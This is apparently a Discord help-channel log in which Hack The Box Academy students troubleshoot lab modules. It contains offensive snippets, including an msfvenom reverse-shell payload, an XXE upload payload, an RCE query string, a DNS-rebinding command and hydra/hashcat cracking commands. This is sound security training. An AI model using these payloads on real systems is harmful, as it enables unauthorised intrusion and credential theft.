#modules
did you edit the configuration file
I have to add this manually?
```nginx
upstream tomcats {
    server <TARGET_SERVER>:8009;
    keepalive 10;
}
```
yes
you have to point it to the ajp port
you're basically using your own nginx server running tomcat with ajp, but ajp configured to reach out to the victim's "hidden" manager behind it
instead of your own
Does anyone know if the Senior PT path is something we could be ready to take after CPTS?
Like this?
revert what other changes you made, but yes
and also make sure to add the location part
just like the section shows
nice
And what does this vuln do?
it allows you to interact with the apache tomcat manager
What?
It's more of web, so CBBH would be more appropriate.
Cool, I was thinking about the CBBH actually. It seems a lot of jobs I read about were leaning towards the web side of things
Yeah, web app pentester jobs are more in demand now
PASSWORD ATTACKS -----> Passwd, Shadow & Opasswd
"I'm not sure if Note.zip is helpful because I can't crack it. I also can't execute the command 'sudo cat /etc/shadow'; it says I don't have permission to view it. I don't know what to do. Can someone help me?"
For the skills assessment on Introduction to digital forensics, are we meant to just use the tools available on the target (not many) or install additional ones? As the target doesn't have internet access I wanted to check, as the rest of the module teaches us about other tools
look for things in other directories that may contain hashes
question : Which kernel version is installed on the system? (Format: 1.22.3)
Output of uname -a :
Linux htb-8yvuz4jqmn 6.1.0-1parrot1-amd64 #1 SMP PREEMPT_DYNAMIC Parrot 6.1.15-1parrot1 (2023-04-25) x86_64 GNU/Linux
None of the 6.1.0-1 answers work
can't say screen
ssh into the target
i don't have the IP
click this
nope you didn't ssh in
i spawned the system and then open a terminal
yes then you need to ssh into the target, pwnbox is not the target
^^^^^^^^
ok ty
Your prompt led me to use the command 'find / -name 'shadow' 2>/dev/null', and I found the important file 'shadow' in hidden files. Thank you.
Can I identify a hackthebox account with 2 discord accounts?
what you see is what you get. everything on the target has what you need to complete the skills assessment
hi is this intended ??
```powershell
Set-ExecutionPolicy Bypass -Scope Process

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https://go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes  [A] Yes to All  [N] No  [L] No to All  [S] Suspend  [?] Help (default is "N"): Y
Set-ExecutionPolicy : Windows PowerShell updated your execution policy successfully, but the setting is overridden by
a policy defined at a more specific scope. Due to the override, your shell will retain its current effective
execution policy of Unrestricted. Type "Get-ExecutionPolicy -List" to view your execution policy settings. For more
information please see "Get-Help Set-ExecutionPolicy".
At line:1 char:1
+ Set-ExecutionPolicy Bypass -Scope Process
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (:) [Set-ExecutionPolicy], SecurityException
    + FullyQualifiedErrorId : ExecutionPolicyOverride,Microsoft.PowerShell.Commands.SetExecutionPolicyCommand
```
Ok thanks. I'll try with what's available
anybody help for this on CDSA Introduction to DF skill assessment
Determine the registry key used for persistence and enter it as your answer.
I got the exact registry key and saw the persistent executable but it doesn't accept my answer
expand abbreviations (HKLM -> HKEY_LOCAL_MACHINE)
got it! thanks man! they should've put an answer format or something lol..answer could be anything
CBBH it is then 
ayee, gl!
I am focusing more on network.
no, you can only connect one HTB account with one Discord account
Can I change it to different discord account later?
Yes, this is possible, but requires help from a mod or admin
thx, it worked (as expected), but why did the ps command not work before?
Due to the override, your shell will retain its current effective execution policy of Unrestricted.
looks like it's already been set
yeah, as in the machine spawned with the SEP being unrestricted
anybody know how I can fix RDP? It's incredibly slow if it does connect, and most of the time it doesn't. I am trying to do the AD enumeration and attacks module again; the first time round I had no issues. I am using xfreerdp because I can't get rdesktop to connect: it says invalid password even though I've copied it and also tried putting it in quotes. I tried remmina as well but that doesn't connect at all.
I'm doing the starting point boxes, Dancer to be specific, and I'm attempting to enumerate the SMB share, and I am having problems.
Wondering if anyone can explain?
```
smbclient '\\\\10.129.113.100'
Password for [WORKGROUP\headrx]:
do_connect: Connection to  failed (Error NT_STATUS_NOT_FOUND)

headrx@DESKTOP-ODAQPF6:~/htb/dancer$ smbclient -L '\\\\10.129.113.100'
do_connect: Connection to 10.129.113.100 failed (Error NT_STATUS_HOST_UNREACHABLE)

headrx@DESKTOP-ODAQPF6:~/htb/dancer$ smbclient -L '\\10.129.113.100'
do_connect: Connection to 10.129.113.100 failed (Error NT_STATUS_HOST_UNREACHABLE)

headrx@DESKTOP-ODAQPF6:~/htb/dancer$ smbclient '\\10.129.113.100'
Password for [WORKGROUP\headrx]:
\\10.129.113.100: Not enough '\' characters in service
```
what gives ?
```
xfreerdp /v:10.129.168.153 /u:htb-student /p:Academy_student_AD!
[14:09:17:390] [5469:5470] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[14:09:17:390] [5469:5470] [WARN][com.freerdp.crypto] - CN = ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
[14:09:26:417] [5469:5470] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[14:09:26:419] [5469:5469] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
```
getting this error over and over; I can ping the machine just fine
you should use SMBMAP to find the sharedname before SMBCLIENT? the correct smbclient should be like "\\10.129.113.100\sharedName", I think....
host unreachable
you don't need smbmap to find base shares
Same issue here
3rd time I'm respawning a machine and still can't RDP to it...
potentially an issue on their end then
also wrong channel, there's a #starting-point channel; read and follow #welcome to access it
no
4th machine spawned, it didn't work (using my VM)
I've tried using the browser VM and it worked
Better than nothing
I've tried everything, even pwnbox, multiple RDP clients, all kinds of VPNs; can't get it to work. Put it in community help but may have to message staff.
which section are u on? I'm doing LLMNR poisoning (Windows)
Good luck
Still, we have to use a very slow RDP connection
Can't it be fixed?
CDSA part
that's not really specific
module name will generally be more helpful
and if pwnbox works but your own connection doesn't: it's likely your own connection
SKDY is on CPTS part, I'm on CDSA part
no, pwnbox doesn't work for me either
Ok
i take it you've already tried contacting support?
nope not yet about tp
is it possible to connect to academy modules through my own VM? I was able to connect to the VPN provided in the module, but when I ping the spawned target there's no response
soon as i message them it will probably work again
Same errors as SKDY, but PwnBox is working, so I'll use it for now
Message sent to support, I'll wait for their feedback
yeah it sometimes just takes some time
okay, thanks
some boxes don't respond to pings
ill try pwn box again now
good to know thanks for that
make sure you turn off the vpn on your machine before using the pwnbox
yeah done it
Anyone done Skill Assessment part for advanced sqli modules?
https://academy.hackthebox.com/module/188/section/2004
sorry if this is a dumb question, but where is the support chat? I don't have the bubble icon for it
disable adblock
ta
oh, nvm. got it
May I ask where I can submit security vulnerabilities for the hackthebox academy
via support
this is taking a while :/
yep this is super normal, had to hold in my anger every time the module required rdp kek
No, I don't think it's normal; even the pwnbox doesn't want to connect. Seems like something on their end
thx
nah i meant ur not the only 1 that faces this frustrating issue haha
2 people already said they're having the same issues with windows machines
I thought I was the only one with the problem..
```
64 bytes from 10.129.102.30: icmp_seq=12 ttl=127 time=3852 ms
64 bytes from 10.129.102.30: icmp_seq=13 ttl=127 time=2853 ms
64 bytes from 10.129.102.30: icmp_seq=14 ttl=127 time=1830 ms
64 bytes from 10.129.102.30: icmp_seq=15 ttl=127 time=810 ms
64 bytes from 10.129.102.30: icmp_seq=16 ttl=127 time=2114 ms
64 bytes from 10.129.102.30: icmp_seq=17 ttl=127 time=1115 ms
64 bytes from 10.129.102.30: icmp_seq=18 ttl=127 time=94.9 ms
64 bytes from 10.129.102.30: icmp_seq=19 ttl=127 time=1391 ms
64 bytes from 10.129.102.30: icmp_seq=20 ttl=127 time=396 ms
64 bytes from 10.129.102.30: icmp_seq=21 ttl=127 time=3819 ms
64 bytes from 10.129.102.30: icmp_seq=22 ttl=127 time=2825 ms
64 bytes from 10.129.102.30: icmp_seq=23 ttl=127 time=2964 ms
64 bytes from 10.129.102.30: icmp_seq=24 ttl=127 time=1963 ms
64 bytes from 10.129.102.30: icmp_seq=25 ttl=127 time=962 ms
64 bytes from 10.129.102.30: icmp_seq=26 ttl=127 time=23.6 m
```
Message support/change vpn region
switching eu to us seems to help
slow pings yes
anyone else in here has performance problems with rdp sessions?
yes, switched to US, much better
Folks, I'm doing the Windows Privesc Module, and happened many times that after adding my user into the local admin groups, I still can't open administrator folder. Any idea why ?
```
C:\Users\server_adm>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
server_adm
The command completed successfully.

C:\Users\server_adm>whoami
inlanefreight\server_adm
```
Hi guys,
dumb question about the "Dynamic Port Forwarding with SSH and SOCKS Tunneling" module.
I solved it with the dynamic port forwarding and rdp.
I was wondering if it's also possible with SSH Local Port Forwarding, but I couldn't make it work.
I tried the following:
`ssh -L 1234:localhost:3389 ubuntu@10.129.216.126`
Then i tried:
`xfreerdp /v:127.0.0.1 /u:victor /p:pass@123 /port:1234`
But it didn't work. Any idea why?
a question:
what is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k.
I have typed in the console:
find / -type f -size +25k -size -28k -name *.conf -newermt 2020-03-03
all it comes up with is a load of permission denied files
I did gpupdate && gpupdate /force, didn't help. Then I logged off with shutdown /l and relogged in, bingo. thx
This is what I use: ssh -L 3390:10.129.210.16:3389 babadmin@192.168.1.66 Then RDP 127.0.0.1:3390
1.66 is my local Kali and 10.129 is the HTB box
someone help idk what I did
your syntax is wrong, you're forwarding your own localhost, you'll need to do ssh -L <localPort>:<destHost>:<destPort>
Helps to know what module and section
Linux fundamentals
And which section?
Why didn't the module use that syntax as well? I thought I want everything I send to my local port to be sent to port 3389 on the destination host. Maybe I'm stupid and misunderstood the module in that part.
find files and directories
hey guys, I could do with a little help with the file transfers module. The question asked me to upload a file called "upload_win.zip" using the method of my choice, and once uploaded, RDP to the box, unzip and run hasher upload_win.txt.
So I set up FTP on my machine, RDP'd into the target machine and downloaded the upload_win.zip file to the desktop using the shell, but when I go to extract the file on the target machine it tells me:
"windows cannot open the folder. the compressed (zipped) folder C:/Users/htb-student/Desktop/upload_win.zip is invalid"
Does anybody know why this is happening?
PASSWORD ATTACKS -----> Passwd, Shadow & Opasswd
I have obtained passwd.bak and shadow.bak files, but encountered issues during password cracking. Regardless of using mutated passwords or the original ones downloaded, I couldn't crack the hashes. Here are the commands I've tried:
```
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes password.txt
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes password.list
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes mut_password.list
```
But yeah, it works that way, thanks
oh wait my bad, typed wrong, you are forwarding the ubuntu host's port, but does it have rdp available?
Make sure you are redirecting stderr to /dev/null to get rid of your error messages like shown in the section where you got your current command from
Ahhh ok, that makes sense, but it wasn't really clear to me in the module. Now I think I got it.
My quick one-liners, if that helps:
```bash
# local port forwarding
# the target host 192.168.0.100 is running a service on port 8888
# and you want that service available on the localhost port 7777
# localhost can also be a remote host
ssh -L 7777:localhost:8888 user@192.168.0.100

# remote port forwarding
# you are running a service on localhost port 9999
# and you want that service available on the target host 192.168.0.100 port 12340
ssh -R 12340:localhost:9999 user@192.168.0.100

# Local proxy through remote host
# You want to route network traffic through a remote host target.host
# so you create a local socks proxy on port 12001 and configure the SOCKS5 settings to localhost:12001
ssh -C2qTnN -D 12001 user@target.host
# The -N flag prevents SSH from executing any remote commands, meaning we will only receive output related to our port forward.

# Use SSH from a remote host, and use this remote host as SOCKS proxy
confluence@confluence01:/opt/atlassian/confluence/bin$ ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215

# From remote host to my local machine, to forward to a machine behind remote machine
# See image below (1)
confluence@confluence01:/opt/atlassian/confluence/bin$ ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4

# Remote dynamic port forwarding: remote host connects back to us, then we use local port as SOCKS proxy to reach device behind remote host (2)
confluence@confluence01:/opt/atlassian/confluence/bin$ ssh -N -R 9998 kali@192.168.118.4

# use SSH via a proxy
kali@kali:~$ ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215
```
First get rid of the hash in chat, it's a spoiler. You don't need the other field past that last period.
No matter i bypassed it
Okay, I removed the hash, but I can't get the plaintext password, which is frustrating.
I'm not sure what went wrong with my operation. Could you please give me some guidance?
rdp -> citrix = pita
make sure you copy the whole line, use the mutated list to crack it, and you need to crack root's hash iirc
On Active Directory passwords module I'm at the last question: input Jennifer Stapleton's username:pass. So I copied NTDS.dit and the system hive, dumped hashes to a file. Now I have about 5 usernames and passes. However, Jennifer Stapleton's password is not accepted at the last question as being correct. I've typed it and copy-pasted it. Case sensitive also.
I Mrs I know hashcat isn't wrong about the password, any ideas so I can move forward
Mean not Mrs
are you using hashcat with sudo/as root? sometimes that breaks it
what's the module and section
Passwords module Active Directory and ntds.dit
I'll send you the hash and pass and you can see what it is, if you like
what's the first and the last character
that seems right, dm me the whole thing
Ok
Check that you don't have spaces before or after the password in that submit field
i can give you a hint if you need via dm
sure
it's correct, yeah make sure there's no spaces and refresh the page
Module: AD Enumeration & Attacks - Skills Assessment Part 1, Question: Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer. I have tried to retrieve all tickets using setspn.exe but I couldn't create a security token with the SPN given, and also tools like Rubeus and PowerView could not be used. I might need a nudge as to where to go next on this.
those tools can definitely be used, also advise to get a better shell to make things easier
im thinking of perhaps a reverse shell, with the payload transferred from my attack machine to the target
Hi guys! I'm a beginner on HTB and I'm stuck here with an RCE on a URL that works fine to navigate through the Administrator folder and find the flag.txt, but I don't know how to open it / transfer it to my attacker machine... Does anyone know the problem? (my RCE command is ?&cd../../../../../../..&cd/Users/Administrator/Desktop&dir)
no i m on htb academy on the module called "Attacking Common Applications - Skills Assessment I"
is it "type flag.txt"?
I don't have access to your link
type command doesnt work even with %20 or +
because you need to link your HTB account to discord
ohh well thx
did you manage to run commands ? like whoami for example ?
yeah dir command works fine but woami does not work
it's whoami
not woami
yeah i mean whoami does not work
try type+C:\Users\Administrator\Desktop\flag.txt
maybe you need to use url encoding , use decoder from burp
Hello moan, can you help me please? I must send this request to receive a new password for my administrators but I don't find why
I just check my note , it's a CVE
thank you so much, I'm gonna try this!
Hey guys, I've been doing "User Enumeration via Response Timing" from the whitebox attacks module and the whole goal is to enumerate a valid user based on time. The problem is that I've been trying this for so long and I still can't find a valid user. The wordlist in the hint provided is way too large. Any hints please?
try fuzzing on the uids
https://academy.hackthebox.com/module/147/section/1391
"Password Mutations" - "Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer."
The list is huge with ~94k lines and the bruteforce slow. Am I doing it right?
I can see that there are some other services but they don't really seem faster.
you got the right list
Normally the academy stuff is very fast - so you are saying this one just takes a lot more time?
Nevermind I just cracked it.
Still so much slower than the other tasks, weird.
Thanks though!
this rule doesn't apply on this module, it took me hours to brute force this one
Yes, finally I have a solution (I found a flag, but is it possibly base64 encoded?)
if you got the flag just copy paste , no encoding
weird , idr doing that , congrats tho
it probably took longer than expected but I finally did it!!! thank you so much for your help !!!
HELP: Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data any suspicious loads of clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format: _.exe
My code so far is this: `sourcetype="WinEventLog:Sysmon" ImageLoaded="clr.dll" Image!="C:\Windows\System32"`
I don't know if I am on the right track, any help will be appreciated
Hello there good day, I have a question.
The things taught by the academy.
Are they principle based or subject based.
That is, concerning web penetration for instance, is one going to be taught certain principles of attacking any web system, instead of the actual attack way, emphasis on principles.
Something standing the test of time as long as it has to do with web systems.
Adapting to the dynamic nature of web systems
I can elaborate on this to provide more understanding for answering my question. I believe it is clear though.
both
there are some principle stuff (the tier0 and 1 modules) then subject stuff (tier2+)
but a lot of it revolves around base principles
I am familiar with some of the Tier 0 and 1 topics
Examples include Thinking outside the box, Linux Fundamentals.
Would you say these are some of the principles ?
Learning process as well.
yes. but there's also just broad topic modules
that dive into the principle of the attack
overall the modules gear you for success
I See.
I have a change of heart towards approaching HTB academy now.
Thank you.
why did htb tell me the wrong way to create an smb share and also the wrong way to connect to an smb share in Windows Fundamentals
yeah and it doesn't work
smbclient -L doesn't work and it doesn't mention anything about slashes either
I would take it personal if I were you.
you would take it personally?
Yes.
smbclient does work
i said -L doesn't work
it's usually smbclient -L \\\\ip\\
or smbclient -L //ip/
since \ is an escape character, you need to double up if you're using it for this purpose
however smbclient works with both directional slashes
yeah i figured that one out through some forums
// or \\\\
i ended up using forward slashes
it's just weird that the module doesn't mention that
¯\_(ツ)_/¯
i mean reading the man page of a tool helps or it's shown in the example
never mind it was right about the way to create a share
so i have no idea what went wrong the first time i tried it
I cannot connect to the linux privilege esc lab. The lab is running, but I cannot connect to it via ssh.
I use pwnbox or vpn but nothing
which chapter is it?
Environment enumeration
is there any error that it shows?
Host works and port works but I can't connect via ssh
i just tried it rn and i managed to connect via ssh
maybe restart your machine and refresh the page
I restarted the device more than 10 times. I tried to connect to pwnbox, but the same problem
I tested another module same problem
Help please > Modern Web Exploitation Techniques - Skill Assessment - Last Question. I inserted my IP into the webmin interface, ran the dnsrebinder, but it does not give me the flag. Is it a bug or something that I'm missing?
you're missing something, not a bug
what password are you using
hi guys, I'm on Skills Assessment - File Upload Attacks
You are contracted to perform a penetration test for a company's e-commerce web application. The web application is in its early stages, so you will only be testing any file upload forms you can find.
Try to utilize what you learned in this module to understand how the upload form works and how to bypass various validations in place (if any) to gain remote code execution on the back-end server. But I can't find the uploaded file area:
```http
Content-Disposition: form-data; name="uploadFile"; filename="sc.phar.svg"
Content-Type: image/svg+xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/contact/submit.php"> ]>
<svg>&xxe;</svg>
```
but no work; it works for index.php tho
if your payload works and you didn't find the info on the pages you checked, you should check other pages
i did check other pages
which other pages did you check
so what pages are those
php
you have two pages called "php"?
that doesn't sound right, the endpoints aren't going to be named the same
you should enumerate for more pages to read
you need to analyze the upload page to understand where it's being uploaded to
I even pressed the apply configuration button there ... I don't have a clue why it's not working
my guess is your rebinder command
I'm using the default one sudo python3 dnsrebinder.py --domain attacker.com --rebind 127.0.0.1 --ip 1.1.1.1 --counter 1 --tcp --udp
you can see from your rebinder screenshot it's only resolving as 127.0.0.1, hence the error on the page saying private IP detected
it is not recognizing it as 1.1.1.1, so something is off there
any hint? Because I don't have a clue x.x maybe at the webmin?
if you're sure the command is correct, the previous step required for that to work would be setting up a name server, so i would probably check to ensure that's setup correctly as well
Yep, I put my ip there at the dns client as they taught us
like i said i'd double check it all. if it's setup correctly it'll work. your screenshot shows it's not working, so that's what i would personally look into.
okok thanks! I'll double check it here
any idea ?
```
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms16_075_reflection_juicy) >
```
I'm attempting to enumerate a box, have nmap'd, gotten a port 5000 open, attempted to open it as a webpage at that address, but no bueno, can't find it... this is for Headless..
i can curl the page and get it, but not via a web browser..
any ideas ?
Anyone do "Attacking Common Services - Medium"? I found the nonstandard port starting with 3 but hydra isn't cracking it with the resource user/pass lists. Is there another list I should be using? Others have suggested using nmap -sC to get more information but I am not getting any additional results from that. It is an FTP service that does not allow Anonymous login
I thought it was a different port?
There is another FTP service available. From some of the forums it seemed like the port starting 3 was the initial foothold
ohh im sorry i thought you were on another section
hey guys
excuse me, may someone answer me please
anyone knows any service similar to HTB that teaches AI rather than cyber security?
You can probably google AI/ML courses
right :) thank you!
I was just thinking about that it might be fun website like HTB and so on
Guys, I am stuck at the Protected Files module in Password Attacks. The question is asking for Kira's password, which I believe I got in previous modules, but the problem is I had a long break and I am continuing the modules. Can anyone guide me in which module I can find Kira's password?
https://www.datacamp.com/
https://brilliant.org/
https://www.codeavail.com/blog/ai-projects-for-students/
or if you like udemy you can get this course it seems pretty popular and highly reviewed...
https://www.udemy.com/course/machine-learning-and-ai-with-hands-on-projects/
fair warning you can get udemy for free from your local library if they've partnered up with them
You used her password in the credential hunting linux portion (see the hint)
You get kira's password in the credential hunting in linux section
hi folks, I am on the pivoting module and have a conceptual question / doubt
when doing remote / reverse port forwarding... do I still need socks? no , right?
like... let's say my pivot is Linux and my target in the internal network is Windows. I want to capture a reverse shell on my Kali machine.
No need to edit proxychains.conf, correct?
Some don't use socks as their proxy
what do you mean with "some"
But it just depends on the tool
I mean exactly that, proxychains uses a socks proxy to serve traffic
well, if I setup nc on Kali and I just want to "grab" the reverse shell
do I need socks? yes or not
You'd need some link between the devices
'cause I do not see that mentioned on that lesson
You'd need some pivot/proxy to forward traffic to your system
right, that's ssh with -R no?
Sort of
again, I do not see any step on that lesson messing around with .conf
so it is a correct assumption, we don't need it during a remote / reverse port fwd scenario?
With -R you are creating a reverse proxy, but if you're trying to catch a shell from the third machine, you need to have it call back to the second and then the second forwards it to you
I understand all that
Again: it depends in the tool used
what tool are you referring? we are using ssh
Most tools that refer to using proxychains will require socks
and xfreerdp
ssh that is being run on Kali with -R ... xfreerdp.....what tool are you referring to? there is no tool in that scenario
sigh if the example commands don't use proxychains, you don't use proxychains
Xfreerdp is a tool, ssh is a tool
This lesson
so the answer is no?
I assume
on this particular scenario, using ssh and xfreerdp...
What this is showing, if you're actually paying attention, is that the -R in this case is the bridge
this leads to my next question... is there any list of tools that require socks?
Just take notes of the ones from this module that do
There's no grand list that has all this info
ok
If it does, it does, if it doesn't-- it doesn't
ok
It's just that simple
I was just trying to recreate that but I couldn't
it seems there is a missing step
I need to use socks to rdp and run the .EXE
that's not shown
No you don't
then how do I suppose to execute backupscript.exe?
If I am not logged in windows?
I need to run it, to invoke the reverse shell
I believe you might be able to log into the second host with ssh from the Ubuntu host
Otherwise, gain rdp access with another method
Which it could be, did you rule it out?
no, but very uncommon
the two exercises do not ask that, but I was curious and tried to mimic the whole scenario
ssh into ubuntu pivot to windows, proxy into rdp to windows
that's what I am saying but then I need socks
Yes, which isn't illegal to use
proxychains xfreerdp blah blah
then use socks?
Like. This whole scenario is built around you already having some form of access to the internal network
what are u trying to do? not use socks?
ok, I did something wrong, maybe the payload.... I use a regular msfvenom payload not http one for meterpreter
get a reverse shell
sigh
relax, just trying to learn
You're trying to overcomplicate it
This section and the previous one go hand in hand
did not want to use multihandler
Also you can open multiple ssh sessions to a target at the same time btw
u would need to make the traffic from the pivot host (ubuntu) transfer to your local hosts from windows
msfvenom -p windows/shell_reverse_tcp LHOST=172.16.5.129 LPORT=8080 -f exe > backupscript.exe
I used that
which I did, with -R and ssh
Use the exact syntax of the one given by the module
wouldnt lhost be your local box? im not on my laptop
again, I am trying to tweak it
deviate from its original purpose
avoiding multihandler
Don't tweak things until you've got it working first
No
I have no issue with the other way
In this module the lhost is the jumphost
I just want to understand why it did not work
ohh got it
I know that
I'd honestly stop bothering with trying, as there's other (better) tools
Also fwiw idt windows/reverse_shell_tcp is even a payload
but I just wanted to recreate the whole exercise, without multihandler
I guess the exercise was designed to work "as is"
You can definitely tweak it for you, if you set the payload right
ok
Also I was right
I will play around with it tomorrow
It's not windows/shell_reverse_tcp
It's windows/shell/reverse_tcp
Which is likely why your payload doesn't work
Good point... I will give it a try
Thanks for the extra patience , lol
All I did was google msfvenom payloads
I do not like to move on and "accept" stuff just because
Sometimes it saves the mental strain of finding out you're just being dumb
Yeah, I have a full list in my notes, it's late and I am tired, missed that being staged
excuse me?
asking questions is not being dumb
sorry to pivot the current subject. i am on password attacks lab - medium. I obtained a zip folder which had an encrypted .docx file inside. I was able to convert the hash and get the password for the .docx. only issue is i have no way of reading the file in the first place. I tried using docx2txt and libreoffice. for some reason Libre causes an error stating javaldx may not work properly and just shuts down.
that was rude
It's not a personal dig, it's literally saving the feeling of being dumb for not realizing you made a simple syntax error
Which I've done multiple times myself
Try with openoffice
Sorry that you took it as rude. Didn't mean it that way. Maybe you should get some rest if something that small bugged you.
I am certainly calling off the night, but that is not something "small"
I do not call people dumb
have a good one
I didn't call you dumb, just the situation of being dumb with syntax errors dude
Happens to literally everyone
he's just still too new to know that it happens to everyone with syntax xd
htbdbstudent or whatever still haunts me
sudo allows you to not perform the 3-way handshake...which is faster but requires admin privs.
when enumerating, it is always recommended to use -sV ... and also, -sC ... so you can get as much info as you can from a given service, assuming the ports are open
People have their own preference when using nmap.... I personally prefer to check for open ports (with nothing else) then I use -sV on those open ports. Hope that helps.
for the HTB Academy Module: Active Directory LDAP - Skills assessment, has anyone run into the issue of {'desc': "Can't contact LDAP server", 'errno': 107, 'info': 'Transport endpoint is not connected'}
sudo gives you access to the raw sockets
I think it could be an issue with certificates, but I'm not entirely sure
any chance of having a regex added for when i verify the flag? i keep leaving spaces in then thinking i've got the wrong flag
I don't recall any issues with that module
so I obtained the password for id_rsa. How do i know what user it belongs to? i already solved the module, which it belongs to root, but that was after someone spoiled the answer for me.
if i was on a real engagement am i just blindly testing id_rsa with "root" as the user
when i ssh
what happens if i found numerous users and don't know what user the key belongs to?
FYI the key was encrypted, so i dont see anything in plain txt
by itself the key doesn't contain any info about the owner or the accounts it can access. only indirect ways like checking the accompanying public key or authorized_keys file, looking for clues in the filename or path, checking ssh agent or ssh config files, sometimes there may be key metadata
or just bruteforce it if you have a list of users
fuck around and find out- best tip ever
definitely doing so.
u use htb academy?
haven't really looked much around htb, just saw a couple challenges and want to learn pen testing
what's in academy?
if i could start over again, i would complete the modules getting started and learning process to get my mentality stable
ur getting nowhere if u dont have clear mentality
and for nmap, that's like the bare start for many people and i guarantee u won't understand 99% of the info it gives you until you progress further
like vulnerability discovery, weak points, insecure services etc
so its alr to get fucked at first
i'm not so worried , obviously on the very easy challenges and i have plenty resources to look at but i know i will get to where i want to be in a couple months time
u will get worried when you screw up. i advise you to do the learning process on htb academy
the module is just yapping about random stuff but its very nice
Wrong channel, #starting-point is for starting point machines (read and follow #welcome to access it)
ty
You can rename the files
genuinely...who cares
like ik its not the right channel
People that want to keep this channel on topic
never heard them
dont get triggered by single question in wrong channel
and it's genuinely the better place to search for help with starting-point machines ¯\_(ツ)_/¯
fuck around and find out lol
As common questions people have had have been asked and answered
The fuck does that mean in this context? Lol
I have, just no idea what it means in relation to the statement you replied to
that mfs will take their time, find different channels, explore new shit, and no need to get triggered by one question asked in the wrong channel
I'm not being triggered?
I'm stating a fact: wrong channel, and it's fairly common that people just click through and not even know there's more to the server
Some people know and just refuse to link their account
¯\_(ツ)_/¯
But keeping this channel on topic for modules allows others that need help not get drowned out by unrelated nonsense
Like this argument?
that's a fire argument ngl but i personally prefer to answer people in place instead of referring them to the channel they are 'supposed' to ask in
whatever boats your float dude ¯\_(ツ)_/¯
then you're doing it wrong, right channel for the right things
what's that supposed to mean
I wasn't calling anyone out for helping them
wrong channel for right things?
ik
Just informing that there's an apt channel for it
Sorry for trying to be more helpful to them. It also prevents future times of asking in the wrong channel and then being redirected again
If I was "triggered" over it, I wouldn't have pointed them in any direction
never confronted you for being "more helpful"
but alr
it isnt
which day do i deserve?
Whatever the day may bring
my day brings exams, a lot, anyway, byebye
Okay. Enough.
Seeking help for WINDOWS ATTACKS & DEFENSE : Kerberos Constrained Delegation
Question: Use the techniques shown in this section to gain access to the DC1 domain controller and submit the contents of the flag.txt file.
My issue: I've RDPed into the target system and ran the powerview.ps1 script. By right I should have Get-NetUser cmdlet available at this stage. However when trying to run it, powershell keeps telling me the command is not found
you need to import powerview instead of just running it
ah Thanks. missed that out in my notes
@fathom pendant It's smart to direct people to the appropriate sections because people mute/hide sections they don't care about. It's nice that you're active and helping others. It takes 10 seconds to cut/paste a question to the appropriate section. Thanks for being a good community member and doing your best to communicate well.
Hello
Any professional hacker here?
no
I wanna ask something
So I'm on Password Attacks Lab - Hard. They provided the J***** user, but running the mut_pass.list created with provided resources through crackmapexec smb is so unfeasible. Am i missing something here? because at the rate it is brute forcing the smb it's going to take 18 hours plus.
I want to learn hacking but I don't have laptop
use hydra
if you can type here, you can watch videos and google things. try watching some videos
my hydra does not work with smb for some reason
target a different service.
Dude I'm talking about hacking.
Most of hacking tutorial are about practical topics
just tried a different service with hydra and estimation is 17 hours
what service is that?
rdp
There are a lot of videos about hacking. Some explain stuff how it works, like ippsec etc
But without a laptop it's gonna be hard
Yeah
I'm also reading some books but
cant you extend it?
extend it?
the time of the box
yeah max 6 hours
yes.
hydra states 18 hours
I mean htb offers a pwnbox as well so you don't need to have a "good laptop", you can just boot up the pwnbox and start doing the module
that's the time it takes to go through all the passwords, not the time to crack it
well hydra can only work with 4 parallel connections when it comes to rdp
the -t 64 won't do anything, you just have to be patient
Can we skip the password module? After seeing this i don't want to work on this module before coming back to my good pc. I don't want to crack that on my mac/pwnbox
are you supposed to do rdp 
sure, buy me gold annual and I'll give you the answers 
well it just hit. strange why hydra hit so fast and cme never got a hit after 2 hours of me running it
well i know why. as usual it had something to do with syntax. had a capital J instead of lower case on cme.
lol. Ill send a carrier pigeon with a contract
honestly the password module is not bad
all of the mistakes i made are because of syntax mistakes on my part
each module is pretty straightforward, especially on the labs
just have to go back and literally follow the steps HTB took in each module.
I am sure cuz there is rdp on the target. that would be the last thing I would go for, but hey, other than that, it would be cme.
and he says cme has not gotten him anything.
well i tried SMB but it only allows one connection at a time.
and for some reason i can't get Hydra to work with SMB
Then ill guess ill start doing it.... I didnt want to take it since i hate working on mac
the hardest part in the labs though is going to be working with bitlocker and mounting the drive
but how do you know if you haven't gotten there?
